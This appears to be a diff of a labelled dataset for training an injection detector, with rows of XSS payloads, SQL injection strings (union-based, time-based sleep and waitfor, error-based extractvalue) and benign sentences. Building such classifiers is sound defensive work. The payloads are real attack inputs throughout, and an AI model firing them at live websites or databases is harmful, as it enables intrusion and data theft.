contenteditable>test</ca",1,XSS,7130 -"-2430' ) union all select 5712,5712,5712,5712,5712",2,SQLi,21344 -Where's the esthetician?,0,normal,23645 -<textarea autofocus onfocus=alert(1)>,1,XSS,9700 -1 ) as jqbv where 8172 = 8172 and 8148 = like ( 'a,2,SQLi,22221 -#ERROR!,2,SQLi,10956 -"<strong onclick=""alert(1)"">test</strong>",1,XSS,6842 -1' where 9816 = 9816 and 7533 = 7533--,2,SQLi,17195 -1,0,normal,26644 -"1%' union all select null,null,null--",2,SQLi,16697 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2074 -"<iframe src=""""/srcdoc='&lt;svg onload&equals;alert",1,XSS,9731 -Select the right direction for your journey.,0,normal,24030 -I want to choose a painting for the living room.,0,normal,23713 -<style>@keyframes slidein {}</style><keygen style=,1,XSS,7735 +"1"" ) ) union all select null,null,null,null,null,n",2,SQLi,20804 +<optgroup onpointerleave=alert(1)>XSS</optgroup>,1,XSS,2149 +"<ruby onmouseenter=""alert(1)"">test</ruby>",1,XSS,8791 +"-5115"" union all select 1642,1642,1642,1642,1642,1",2,SQLi,19092 +<input2 onpointermove=alert(1)>XSS</input2>,1,XSS,7132 +1 ) as ptxw where 9873 = 9873,2,SQLi,21342 +Where's the hairdresser?,0,normal,23642 +"<video><source onerror=""javascript:alert(1)"">",1,XSS,9702 +"1' ) and updatexml ( 3393,concat ( 0x2e,0x7171706a",2,SQLi,22219 +#ERROR!,2,SQLi,10958 +"<template draggable=""true"" ondragstart=""alert(1)"">",1,XSS,6844 +1' ) and sleep ( 5 ) #,2,SQLi,17197 +select,0,normal,26641 +"-8133' ) union all select 6417,6417,6417,6417,6417",2,SQLi,16699 +"<td onbeforecopy=""alert(1)"" contenteditable>test</",1,XSS,2075 +onmouseover=alert(/Black.Spook/),1,XSS,9733 +Select a dessert to satisfy your craving.,0,normal,24027 +I'm planning to pick up some essentials.,0,normal,23710 +"<aside draggable=""true"" ondragenter=""alert(1)"">tes",1,XSS,7737 <%<!--'%><script>alert(1);</script -->,1,XSS,886 -"1"" ) ) and 7756 = dbms_utility.sqlid_to_sqlhash ( ",2,SQLi,18175 -1 AND 1337=(SELECT 1337 FROM PG_SLEEP(5))-- 1337,2,SQLi,11335 -select case when 7649 = 9297 then 1 else null end-,2,SQLi,14622 -"1' ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( 'gt",2,SQLi,15333 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,7330 -OR x=x,2,SQLi,10201 -"<script onmouseenter=""alert(1)"">test</script>",1,XSS,3896 -Select your government.,0,normal,24870 -1' ) or 6793 = ( select 6793 from pg_sleep ( 5 ) ),2,SQLi,21187 -word1,0,normal,26541 -"-2782' ) ) or 1 group by concat ( 0x7171706a71, ( ",2,SQLi,19423 -"<rb onmouseover=""alert(1)"">test</rb>",1,XSS,8250 -1'|| ( select 'tkmc' from dual where 9675 = 9675 u,2,SQLi,19389 --4961' ) or 3038 = 3038,2,SQLi,18030 -<bgsound id=x tabindex=1 onbeforeactivate=alert(1),1,XSS,8013 -"{""id"":null,""firstName"":""Ddaania"",""lastName"":""Lisa""",0,normal,26963 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10592 -Where's the best ice cream shop?,0,normal,23495 -"end and ( ( ""cxoi"" = ""cxoi",2,SQLi,21315 -"-5963"" or 9323 = 9323#",2,SQLi,21781 -&lt;A HREF=&quot;http://google:ha.ckers.org&quot;&,1,XSS,1469 -"iif ( 8770 = 9611,1,1/0 )",2,SQLi,16855 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10551 -"<embed draggable=""true"" ondragend=""alert(1)"">test<",1,XSS,2723 -"<sup onbeforecut=""alert(1)"" contenteditable>test</",1,XSS,5420 -Select liqueur.,0,normal,24519 -1' in boolean mode ) procedure analyse ( extractva,2,SQLi,17549 -"All you have to do is select a walk and turn up, l",0,normal,26390 -The best thing I have found it to select pieces of,0,normal,25481 -"1%' or row ( 1045,7562 ) > ( select count ( * ) ,c",2,SQLi,12674 -"<time oncopy=""alert(1)"" contenteditable>test</time",1,XSS,6042 -"select * from users where id = 1 or ""\#"" or 1 = 1 ",2,SQLi,12062 -select ( case when ( 5768 = 9169 ) then 5768 else ,2,SQLi,14589 -"{""id"":null,""name"":""Megidramon""}",0,normal,27057 -"1%' or updatexml ( 1808,concat ( 0x2e,0x7171706a71",2,SQLi,18636 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2162 -"-9966' ) ) union all select 7230,7230,7230,7230,72",2,SQLi,16926 -<sCriPt/src=//14.rs?,1,XSS,9248 -Select hike.,0,normal,24644 -Where did you find that unique sculpture?,0,normal,23865 -"1"" where 8697 = 8697 and elt ( 3114 = 3114,sleep (",2,SQLi,13893 --4308' ) or 2724 in ( ( char ( 113 ) +char ( 113 ),2,SQLi,15734 -"1 or benchmark(10000000,MD5(1))#",2,SQLi,10117 -"<basefont onbeforecopy=""alert(1)"" contenteditable>",1,XSS,7266 -Select a book for your reading pleasure.,0,normal,24006 -1' ) ) as stnn where 6160 = 6160 and 8881 = 7347--,2,SQLi,17460 -<style>#x{font-family:foo[bar;color:green;}#y];col,1,XSS,9308 -"<dl oncontextmenu=""alert(1)"">test</dl>",1,XSS,3937 -select * from users where id = 1 * ( \ ) union sel,2,SQLi,11726 -Stone apologized but said he did not select the im,0,normal,25519 --9212 or 1026 = 7967#,2,SQLi,15044 -"<link onmouseenter=""alert(1)"">test</link>",1,XSS,4208 -"1' ) where 6772 = 6772 and row ( 6237,7469 ) > ( s",2,SQLi,14034 -<style>@keyframes slidein {}</style><noframes styl,1,XSS,2150 -Sort results where specified.,0,normal,23262 +"-3587' ) or 5023 = ctxsys.drithsx.sn ( 5023, ( chr",2,SQLi,18177 +1') AND 1337=(SELECT 1337 FROM PG_SLEEP(5)) AND (',2,SQLi,11337 +"-7255' union all select 2127,2127,2127,2127,2127#",2,SQLi,14624 +1' ) ) as qwdh where 7581 = 7581 or char ( 117 ) |,2,SQLi,15335 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,7332 +OR 1=0#,2,SQLi,10203 +"<tbody onkeypress=""alert(1)"" contenteditable>test<",1,XSS,3898 +Select your committee.,0,normal,24867 +1 ) as qzif where 7877 = 7877 union all select nul,2,SQLi,21185 +word1,0,normal,26538 +1 ) ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ,2,SQLi,19421 +"<style draggable=""true"" ondragstart=""alert(1)"">tes",1,XSS,8252 +"1%"" or elt ( 6272 = 6272,sleep ( 5 ) ) and ""%"" = """,2,SQLi,19387 +1' ) where 6214 = 6214 procedure analyse ( extract,2,SQLi,18032 +<link id=x tabindex=1 ondeactivate=alert(1)></link,1,XSS,8015 +"{""id"":null,""firstName"":""Kelvin"",""lastName"":""Low"",""",0,normal,26960 +"UNION SELECT @@VERSION,SLEEP(5),USER(),4",2,SQLi,10594 +Where's the nearest hospital?,0,normal,23492 +Fleming select lead on account of the smallness of,0,normal,26185 +Knowing how to select a GPS device is the most imp,0,normal,25920 +&lt;A HREF=&quot;http://google.com/&quot;&gt;XSS&l,1,XSS,1470 +1%' ) ) and 8312 = dbms_pipe.receive_message ( chr,2,SQLi,16857 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10553 +<body id=x tabindex=1 onactivate=alert(1)></body>,1,XSS,2724 +"<style>@keyframes x{}</style><summary style=""anima",1,XSS,5422 +Select rum.,0,normal,24516 +"1,extractvalue ( 9788,concat ( 0x5c,0x7171706a71, ",2,SQLi,17551 +Also prepare a list of questions you'd like answer,0,normal,26387 +select,0,normal,26626 +select ( case when ( 8403 = 7151 ) then 8403 else ,2,SQLi,12676 +<code onpointermove=alert(1)>XSS</code>,1,XSS,6044 +"select * from users where id = 1 or ""1 ) "" or 1 = ",2,SQLi,12064 +"1"" ) ) ) or extractvalue ( 1297,concat ( 0x5c,0x71",2,SQLi,14591 +"{""id"":null,""firstName"":""Alisa"",""lastName"":""Maclenn",0,normal,27054 +"-3411' ) ) ) union all select 3185,3185,3185,3185,",2,SQLi,18638 +"<canvas draggable=""true"" ondragend=""alert(1)"">test",1,XSS,2163 +"1' in boolean mode ) union all select null,null,nu",2,SQLi,16928 +"<scRiPt y=""><"">/*<sCRipt* */prompt()</script",1,XSS,9250 +Select run.,0,normal,24641 +Let's choose a location for our meetup.,0,normal,23862 +"1 ) or row ( 1045,7562 ) > ( select count ( * ) ,c",2,SQLi,13895 +"-9313%"" ) or 5971 = 4572#",2,SQLi,15736 +||UTL_HTTP.REQUEST,2,SQLi,10119 +"<style>@keyframes slidein {}</style><sup style=""an",1,XSS,7268 +Select the right paint color for the walls.,0,normal,24067 +1' where 9381 = 9381,2,SQLi,17462 +"<svG/x="">""/oNloaD=confirm()//",1,XSS,9310 +"<meta onmouseenter=""alert(1)"">test</meta>",1,XSS,3939 +select * from users where id = '1' or $+<$ union s,2,SQLi,11728 +Students who locate audio tapes or CDs of Civil Wa,0,normal,25516 +"-5174' ) ) ) or make_set ( 9515 = 7938,7938 ) and ",2,SQLi,15046 +<style>:target {color: red;}</style><bdo id=x styl,1,XSS,4210 +1%' ) ) ) and 6240 = ( 'qqpjq'|| ( select case 624,2,SQLi,14036 +<style>:target {color: red;}</style><rb id=x style,1,XSS,2151 +"1%"" ) ) and ( 7817 = 4371 ) *4371 and ( ( ""%"" = """,2,SQLi,20126 "<xss onmousedown=""alert(1)"" style=display:block>te",1,XSS,75 -select,0,normal,26583 -<bdo onblur=alert(1) tabindex=1 id=x></bdo><input ,1,XSS,4017 -Select a piece of artwork for the room.,0,normal,24211 -"1%"" ) ) and make_set ( 9897 = 5557,5557 ) and ( ( ",2,SQLi,13042 -"1"" ) where 5298 = 5298 and 4386 = utl_inaddr.get_h",2,SQLi,14596 -<picture onpointermove=alert(1)>XSS</picture>,1,XSS,3933 -"1' ) ) or 8384 = like ( 'abcdefg',upper ( hex ( ra",2,SQLi,14671 -"1"" ) ) ) and 3754 = ( select upper ( xmltype ( chr",2,SQLi,21025 -"-8999"" where 2821 = 2821 union all select 2821,282",2,SQLi,21250 -1' ) ) and 6537 = dbms_pipe.receive_message ( chr ,2,SQLi,15503 -<input3 onpointerup=alert(1)>XSS</input3>,1,XSS,2510 -<ins onpointerout=alert(1)>XSS</ins>,1,XSS,7282 -"<sCRIpt x="">"" src=//15.rs></script>",1,XSS,9245 -Select your complete.,0,normal,25005 -<style>:target {color: red;}</style><button id=x s,1,XSS,4068 -"-4980"" or ( 8459 = 8459 ) *4906 and ""mnlj"" like ""m",2,SQLi,13101 -"<summary draggable=""true"" ondragend=""alert(1)"">tes",1,XSS,3146 -She'll select her engagement ring.,0,normal,24399 -"1"" and 3707 = ( select count ( * ) from sysibm.sys",2,SQLi,17514 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8698 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,5132 -"1' or ( select 9173 from ( select count ( * ) ,con",2,SQLi,16925 -"<q onmouseover=""alert(1)"">test</q>",1,XSS,7397 -"{""id"":null,""name"":""lift""}",0,normal,27398 -"select * from users where id = 1 or "" ( #"" or 1 = ",2,SQLi,11561 -"1"" or ( select * from ( select ( sleep ( 5 ) ) ) y",2,SQLi,17139 -It premieres on Netflix and in select theaters on ,0,normal,25957 -Select records where valid.,0,normal,23245 -Select a cooking method for the recipe.,0,normal,24179 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,2543 -<sub id=x tabindex=1 onbeforeactivate=alert(1)></s,1,XSS,6074 -1 ) ) as dhqt where 8485 = 8485 waitfor delay '0:0,2,SQLi,20887 +-3185' ) ) or 3440 = cast ( ( chr ( 113 ) ||chr ( ,2,SQLi,22194 +<thead onblur=alert(1) tabindex=1 id=x></thead><in,1,XSS,4019 +Select your message.,0,normal,24900 +-8410' ) ) ) or 8571 = 8571--,2,SQLi,13044 +"1' ) or 8384 = like ( 'abcdefg',upper ( hex ( rand",2,SQLi,14598 +"<img onbeforecopy=""alert(1)"" contenteditable>test<",1,XSS,3935 +1'+ ( select 'hplm' where 4008 = 4008 and 8594 = (,2,SQLi,14673 +"{""id"":null,""firstName"":""Florence"",""lastName"":""Tan""",0,normal,27434 +"1"" or 4411 = ( select count ( * ) from sysusers as",2,SQLi,21248 +1'|| ( select 'rhcv' where 6228 = 6228,2,SQLi,15505 +<title onpointerdown=alert(1)>XSS</title>,1,XSS,2511 +"<map onbeforecopy=""alert(1)"" contenteditable>test<",1,XSS,7284 +<sCriPt x>(((confirm)))``</scRipt x>,1,XSS,9247 +1,0,normal,26688 +"<map oncontextmenu=""alert(1)"">test</map>",1,XSS,4070 +"1"" or 8156 = ( select count ( * ) from generate_se",2,SQLi,13103 +"<meter onkeyup=""alert(1)"" contenteditable>test</me",1,XSS,3148 +Please select a honeymoon resort.,0,normal,24396 +"-2982' or 1570 = convert ( int, ( select char ( 11",2,SQLi,17516 +<del id=x tabindex=1 onfocusin=alert(1)></del>,1,XSS,8700 +<img2 onpointerenter=alert(1)>XSS</img2>,1,XSS,5134 +1' ) where 1183 = 1183,2,SQLi,16927 +<frameset id=x tabindex=1 ondeactivate=alert(1)></,1,XSS,7399 +"-4756"" ) ) union all select 6846,6846,6846,6846,68",2,SQLi,20796 +select * from users where id = '1'<@.. union selec,2,SQLi,11563 +-7564' ) as nank where 8095 = 8095 union all selec,2,SQLi,17141 +"1"" ) where 2922 = 2922 or elt ( 6272 = 6272,sleep ",2,SQLi,20376 +millisecond,0,normal,23242 +But they are roaming a few select sections of Amer,0,normal,26302 +<svg><data onload=alert(1)></data>,1,XSS,2544 +<del onpointerover=alert(1)>XSS</del>,1,XSS,6076 +"-5526 or 1 group by concat ( 0x7171706a71, ( selec",2,SQLi,20885 <isindex type=submit action=javascript:alert(1)>,1,XSS,238 --9331' or ( 4519 = 2912 ) *2912 and 'rddk' = 'rddk,2,SQLi,16485 -Where's the forest?,0,normal,23519 -"1' ) ) ) and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,22118 -"<blink oncut=""alert(1)"" contenteditable>test</blin",1,XSS,5193 -top[‘al\x65rt’](1),1,XSS,4767 -"<;STYLE>;BODY{-moz-binding:url("";http://ha.ckers.o",1,XSS,1621 -<style>:target {transform: rotate(180deg);}</style,1,XSS,8794 -"<META HTTP-EQUIV=\""refresh\"" CONTENT=\""0; URL=http",1,XSS,1309 -"1%"" and 9198 = 9198--",2,SQLi,14375 -"<;BASE HREF="";javascript:alert(';XSS';);//"";>;",1,XSS,1583 -commit,0,normal,23164 -<dl id=x tabindex=1 ondeactivate=alert(1)></dl><in,1,XSS,2432 -"{""id"":null,""name"":""bar vessels""}",0,normal,26937 -"&lt;SCRIPT \""a='&gt;'\"" SRC=\""http&#58;//ha&#46;ck",1,XSS,1045 -Carefully select your wedding decor.,0,normal,24380 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,5010 -1 ) ) and exp ( ~ ( select * from ( select concat ,2,SQLi,17872 -"<ol onkeyup=""alert(1)"" contenteditable>test</ol>",1,XSS,7634 -)))) waitfor delay '0:0:20' --,2,SQLi,10932 -Order a vegetarian dish.,0,normal,22632 -<ruby onpointerenter=alert(1)>XSS</ruby>,1,XSS,5796 -<bdo onpointerup=alert(1)>XSS</bdo>,1,XSS,5492 +"-3177' ) ) union all select 6500,6500,6500,6500,65",2,SQLi,16487 +Where's the river?,0,normal,23516 +"1"" ) as kslq where 8669 = 8669 and 8635 = ( select",2,SQLi,22116 +"<slot oncopy=""alert(1)"" contenteditable>test</slot",1,XSS,5195 +<blockquote onblur=alert(1) tabindex=1 id=x></bloc,1,XSS,4769 +"<;TABLE BACKGROUND="";javascript:alert(';XSS';)"";>;",1,XSS,1622 +"<svg onmouseenter=""alert(1)"">test</svg>",1,XSS,8796 +<script>var var = 1; alert(var)</script>,1,XSS,1310 +"end and ( ""%"" = """,2,SQLi,14377 +"<;BGSOUND SRC="";javascript:alert(';XSS';);"";>;",1,XSS,1584 +cursor,0,normal,23161 +<meta id=x tabindex=1 onactivate=alert(1)></meta>,1,XSS,2433 +"{""id"":null,""name"":""below""}",0,normal,26934 +"&lt;SCRIPT a=`&gt;` SRC=\""http&#58;//ha&#46;ckers&",1,XSS,1046 +Please select a wedding favor.,0,normal,24377 +document.scripts.length,1,XSS,5012 +"1"" ) ) ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ",2,SQLi,17874 +<cite id=x tabindex=1 onbeforeactivate=alert(1)></,1,XSS,7636 +)))))) waitfor delay '0:0:20' --,2,SQLi,10934 atan2,0,normal,23219 -"1"" where 1100 = 1100",2,SQLi,17003 -"select * from users where id = 1 or 1#""? union sel",2,SQLi,11798 -"1' in boolean mode ) and elt ( 4249 = 4249,7259 ) ",2,SQLi,13952 -"<;IMG SRC=';vbscript:msgbox("";XSS"";)';>;",1,XSS,1601 -Select the perfect gift for your friend's birthday,0,normal,22928 -"<area draggable=""true"" ondragstart=""alert(1)"">test",1,XSS,1850 -<colgroup onblur=alert(1) tabindex=1 id=x></colgro,1,XSS,1753 -"<style>:target {color:red;}</style><u id=x style=""",1,XSS,2041 -"1%' ) ) union all select null,null,null--",2,SQLi,18468 -"<sub onmousemove=""alert(1)"">test</sub>",1,XSS,7966 -"HREF=""javascript:alert('')",1,XSS,5232 +<picture onfocusout=alert(1) tabindex=1 id=x></pic,1,XSS,5798 +<noembed onpointermove=alert(1)>XSS</noembed>,1,XSS,5494 +asin,0,normal,23216 +"1%"" and 8312 = dbms_pipe.receive_message ( chr ( 6",2,SQLi,17005 +select * from users where id = 1 <@. union select ,2,SQLi,11800 +1 ) ) rlike ( select * from ( select ( sleep ( 5 ),2,SQLi,13954 +"<;LAYER SRC="";http://ha.ckers.org/scriptlet.html"";",1,XSS,1602 +She picked up a brochure from the travel agency.,0,normal,23773 +<video onpointermove=alert(1)>XSS</video>,1,XSS,1851 +"<style>@keyframes x{}</style><main style=""animatio",1,XSS,1754 +<button onfocusout=alert(1) id=x></button><input a,1,XSS,2042 +"-2862' ) ) ) union all select 6649,6649--",2,SQLi,18470 +<mark onpointerover=alert(1)>XSS</mark>,1,XSS,7968 +<style>:target {color:red;}</style><ol id=x style=,1,XSS,5234 "`""'><img src=xxx:x \x22onerror=javascript:alert(1)",1,XSS,547 -<style>:target {transform: rotate(180deg);}</style,1,XSS,6200 -"1%"" ) union all select null,null,null,null,null,nu",2,SQLi,22110 -Select a fitness class to attend.,0,normal,24024 -<script onerror=alert(1) src=/></script>,1,XSS,5148 -Select both objects Specify rollover settings To t,0,normal,25642 -"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10738 -"-1272' or 1 group by concat ( 0x7171706a71, ( sele",2,SQLi,18052 -1%' ) order by 1--,2,SQLi,12192 -"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10695 -"-3827"" ) or 8571 = 8571--",2,SQLi,22397 -"<basefont draggable=""true"" ondragend=""alert(1)"">te",1,XSS,7170 -"-6463"" ) ) ) union all select 3280,3280,3280,3280,",2,SQLi,16560 -1'+ ( select naiw where 4924 = 4924,2,SQLi,18593 -Select a nice steady tempo; there is plenty of tim,0,normal,25657 -Select mug.,0,normal,24525 -In the general consular service appointments are s,0,normal,25996 -1%' ) and 5556 = ( select count ( * ) from all_use,2,SQLi,14651 -"1"" ) ) ) procedure analyse ( extractvalue ( 9627,c",2,SQLi,15303 -1' ) rlike ( select * from ( select ( sleep ( 5 ) ,2,SQLi,15575 -"ORDER BY 1,SLEEP(5)",2,SQLi,10418 -1' ) ) and ( select 2* ( if ( ( select * from ( se,2,SQLi,22030 --3246%' union all select 4012#,2,SQLi,21000 -"<svg><script xlink:href=data:,alert(1) />",1,XSS,9319 -"Select Back up system files to the recovery drive,",0,normal,25644 -1'|| ( select 'vwmg' where 7928 = 7928,2,SQLi,18826 --1436' or 5699 = 5783--,2,SQLi,17707 -"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,17988 -1 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||,2,SQLi,14091 -<param id=x tabindex=1 onactivate=alert(1)></param,1,XSS,4066 -Select your explore.,0,normal,24988 -"<img src=""javascript:alert('XSS')"">",1,XSS,1295 -"1 ) ) union all select null,null,null--",2,SQLi,15567 -"<command onmouseleave=""alert(1)"">test</command>",1,XSS,2001 -"<b draggable=""true"" ondragstart=""alert(1)"">test</b",1,XSS,2064 -"Select from steak, seafood, chicken or enjoy fresh",0,normal,25628 -"<img STYLE=""xss:expr/*XSS*/ession(document.vulnera",1,XSS,1508 -<strike id=x tabindex=1 onactivate=alert(1)></stri,1,XSS,6684 -1'+ ( select 'jmdl' where 7827 = 7827,2,SQLi,17944 -<object onpointerenter=alert(1)>XSS</object>,1,XSS,5578 -"1"" and 3707 = ( select count ( * ) from sysibm.sys",2,SQLi,20419 -<big id=x tabindex=1 onbeforedeactivate=alert(1)><,1,XSS,8090 -"<noembed ondblclick=""alert(1)"">test</noembed>",1,XSS,5612 -1' ) ) as bswc where 1635 = 1635 and 7756 = dbms_u,2,SQLi,20033 -"waitfor delay '0:0:5' and ( ( ""%"" = """,2,SQLi,20631 -<col onfocusout=alert(1) tabindex=1 id=x></col><in,1,XSS,5336 -javascript:alert()//--></script></textarea></style,1,XSS,9547 -<spacer onpointerenter=alert(1)>XSS</spacer>,1,XSS,4142 -<noembed onfocusout=alert(1) tabindex=1 id=x></noe,1,XSS,7939 -The Health Care Select Sector SPDR (XLV) fell 2 pe,0,normal,25433 -"1', ( case when 5204 = 2136 then 1 else null end )",2,SQLi,13037 -<section onpointermove=alert(1)>XSS</section>,1,XSS,6017 -"-4785"" ) ) ) or 1 group by concat ( 0x7171706a71, ",2,SQLi,12225 -1%' ) ) and ( select * from ( select ( sleep ( 5 ),2,SQLi,17620 -day,0,normal,23202 -He turns to a press aide who will select the quest,0,normal,26112 -"-3443"" ) ) union all select 4043,4043,4043,4043,40",2,SQLi,12950 -"<style>@keyframes slidein {}</style><sub style=""an",1,XSS,2252 -"<xmp onmouseup=""alert(1)"">test</xmp>",1,XSS,3671 -"1 or 6979 = like ( 'abcdefg',upper ( hex ( randomb",2,SQLi,20452 -"1' ) or ( select 9173 from ( select count ( * ) ,c",2,SQLi,19670 -"-8178 ) union all select 4163,4163,4163,4163,4163,",2,SQLi,20922 -"1%"" and 6240 = ( 'qqpjq'|| ( select case 6240 when",2,SQLi,13437 -"Up to 40% off select Milwaukee Power Tools, Access",0,normal,25209 -"-5891 ) where 5792 = 5792 union all select 5792,57",2,SQLi,17332 -select * from users where id = '1' + $ . union sel,2,SQLi,11690 -"1"" or extractvalue ( 1297,concat ( 0x5c,0x7171706a",2,SQLi,19923 -"1"" ) and 3732 = 3850 and ( ""edjv"" = ""edjv",2,SQLi,20407 -1%' and 8635 = ( select count ( * ) from generate_,2,SQLi,19355 -1'|| ( select 'tznb' from dual where 8808 = 8808 r,2,SQLi,14197 -Where's the gallery?,0,normal,23578 -1'|| ( select 'scqw' where 3337 = 3337 or 7427 = d,2,SQLi,19266 -"{""id"":null,""firstName"":""Ng"",""lastName"":""Beng Tee"",",0,normal,27083 -"1, ( select ( case when ( 5726 = 5275 ) then 1 els",2,SQLi,16667 -"1' ) union all select null,null,null,null,null,nul",2,SQLi,12964 -1 ) ) ) rlike ( select * from ( select ( sleep ( 5,2,SQLi,20109 -AND 1 = utl_inaddr.get_host_address ( ( SELECT COU,2,SQLi,11911 -"<tt oncut=""alert(1)"" contenteditable>test</tt>",1,XSS,6698 -Select a fragrance for relaxation.,0,normal,23999 -"<param onmouseout=""alert(1)"">test</param>",1,XSS,6059 -1' ) as njfg where 6392 = 6392 waitfor delay '0:0:,2,SQLi,18225 -1 ) as ryks where 1196 = 1196,2,SQLi,17949 -"<p onmouseout=""alert(1)"">test</p>",1,XSS,4699 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10751 -"<meta onbeforecopy=""alert(1)"" contenteditable>test",1,XSS,3321 -1' ) and 7533 = 7533,2,SQLi,15865 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10465 -"-3513%"" union all select 8473,8473#",2,SQLi,12447 -<var onblur=alert(1) tabindex=1 id=x></var><input ,1,XSS,4774 -<data onpointerover=alert(1)>XSS</data>,1,XSS,6576 -Update your travel plans.,0,normal,22714 -<data id=x tabindex=1 onactivate=alert(1)></data>,1,XSS,4710 -"1, ( cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 11",2,SQLi,17232 -"select count ( * ) from all_users t1,all_users t2,",2,SQLi,20049 -"-1889%' ) ) ) or 5023 = ctxsys.drithsx.sn ( 5023, ",2,SQLi,17223 -"1"" ) as jtou where 8129 = 8129 and 7533 = 7533--",2,SQLi,13654 -"<source onkeyup=""alert(1)"" contenteditable>test</s",1,XSS,8741 -alter,0,normal,23110 -"<sub draggable=""true"" ondrag=""alert(1)"">test</sub>",1,XSS,5786 --5365 or 7517 = 5726--,2,SQLi,15966 -if ( 6842 = 5446 ) select 6842 else drop function ,2,SQLi,16989 -1'+ ( select 'uijv' where 7279 = 7279 and 8312 = d,2,SQLi,13561 -ORDER BY 29--,2,SQLi,10271 -Select the right route for your journey.,0,normal,24224 -<table id=x tabindex=1 onfocusin=alert(1)></table>,1,XSS,7226 -<style>:target {color:red;}</style><nextid id=x st,1,XSS,2312 -"select count ( * ) from all_users t1,all_users t2,",2,SQLi,21381 --4542' ) ) order by 1#,2,SQLi,18367 -"-1425"" ) where 8056 = 8056 or elt ( 1032 = 1032,36",2,SQLi,12659 -<menuitem onfocusout=alert(1) tabindex=1 id=x></me,1,XSS,8392 -Select a scent for your perfume.,0,normal,24101 -<video onpointerdown=alert(1)>XSS</video>,1,XSS,8678 -1 where 1015 = 1015,2,SQLi,15168 -"select * from generate_series ( 4465,4465,case whe",2,SQLi,12917 -"<dialog onkeydown=""alert(1)"" contenteditable>test<",1,XSS,2824 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,4552 -<noscript onfocusout=alert(1) tabindex=1 id=x></no,1,XSS,5337 -"select * from users where id = 1 or ""1&"" or 1 = 1 ",2,SQLi,11438 -"1 ) ) as yfvg where 1454 = 1454 and row ( 6237,746",2,SQLi,14010 -#ERROR!,2,SQLi,11354 -"<area onmouseover=""alert(1)"">test</area>",1,XSS,3750 -"\""",2,SQLi,10395 -"1"" ) ) rlike ( select ( case when ( 7689 = 7689 ) ",2,SQLi,20566 -1'+ ( select sxco where 1623 = 1623 union all sele,2,SQLi,16533 -Sort the colored beads into patterns.,0,normal,22957 -<body onhelp=alert(1)>press F1! (MSIE),1,XSS,9080 +"<colgroup oncontextmenu=""alert(1)"">test</colgroup>",1,XSS,6202 +"1%"" and 7756 = dbms_utility.sqlid_to_sqlhash ( ( c",2,SQLi,22108 +Select a travel destination for a getaway.,0,normal,24021 +<strong id=x tabindex=1 onactivate=alert(1)></stro,1,XSS,5150 +Select Comfort — Select Comfort came in 11 cents a,0,normal,25639 +"AND 5650=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+C",2,SQLi,10740 +"1"" ) ) ) and elt ( 1210 = 1210,sleep ( 5 ) ) and (",2,SQLi,18054 +"1"" ) where 6671 = 6671 or char ( 119 ) ||char ( 10",2,SQLi,12194 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10697 +1' where 1593 = 1593,2,SQLi,22395 +<rb id=x tabindex=1 onfocus=alert(1)></rb>,1,XSS,7172 +1' ) ) or 2633 = dbms_pipe.receive_message ( chr (,2,SQLi,16562 +"-9923%' ) ) ) union all select 8985,8985,8985,8985",2,SQLi,18595 +Select a type of scatter plot required then click ,0,normal,25654 +And so how do you select who purchases your home?,0,normal,26365 +In the preface the author claims to have stated 20,0,normal,25993 +1' where 4417 = 4417 and 6537 = dbms_pipe.receive_,2,SQLi,14653 +"1' ) ) ) and make_set ( 8403 = 8403,8899 ) and ( (",2,SQLi,15305 +1'|| ( select 'vqag' from dual where 8154 = 8154 u,2,SQLi,15577 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4",2,SQLi,10420 +"-1543%' union all select 9341,9341,9341,9341,9341,",2,SQLi,22028 +"select count ( * ) from generate_series ( 1,500000",2,SQLi,20998 +"<template match=""/"">",1,XSS,9321 +Select businesses in the area will also be offerin,0,normal,25641 +"1%"" or 6793 = ( select 6793 from pg_sleep ( 5 ) ) ",2,SQLi,18828 +-4572' ) union all select 3520--,2,SQLi,17709 +1 ) where 6884 = 6884 and 3715 in ( ( char ( 113 ),2,SQLi,17990 +"-9860 ) where 8743 = 8743 union all select 8743,87",2,SQLi,14093 +<style>:target {color: red;}</style><button id=x s,1,XSS,4068 +Select your peek.,0,normal,24985 +"<script language=""JavaScript"">alert('XSS')</script",1,XSS,1296 +1'|| ( select 'xjcg' from dual where 5815 = 5815 u,2,SQLi,15569 +"<Input value = """" type = text>",1,XSS,2002 +document.documentURI,1,XSS,2065 +Select guest room entrances exhibit art inspired b,0,normal,25625 +"<XSS STYLE=""xss:expression(document.vulnerable=tru",1,XSS,1509 +"<noframes onkeydown=""alert(1)"" contenteditable>tes",1,XSS,6686 +1' ) ) and 7230 = 2517,2,SQLi,17946 +"<rp onmouseleave=""alert(1)"">test</rp>",1,XSS,5580 +"{""id"":null,""firstName"":""Justin"",""lastName"":""Toh"",""",0,normal,27390 +<content onpointerdown=alert(1)>XSS</content>,1,XSS,8092 +"<meta onkeyup=""alert(1)"" contenteditable>test</met",1,XSS,5614 +"iif ( 1305 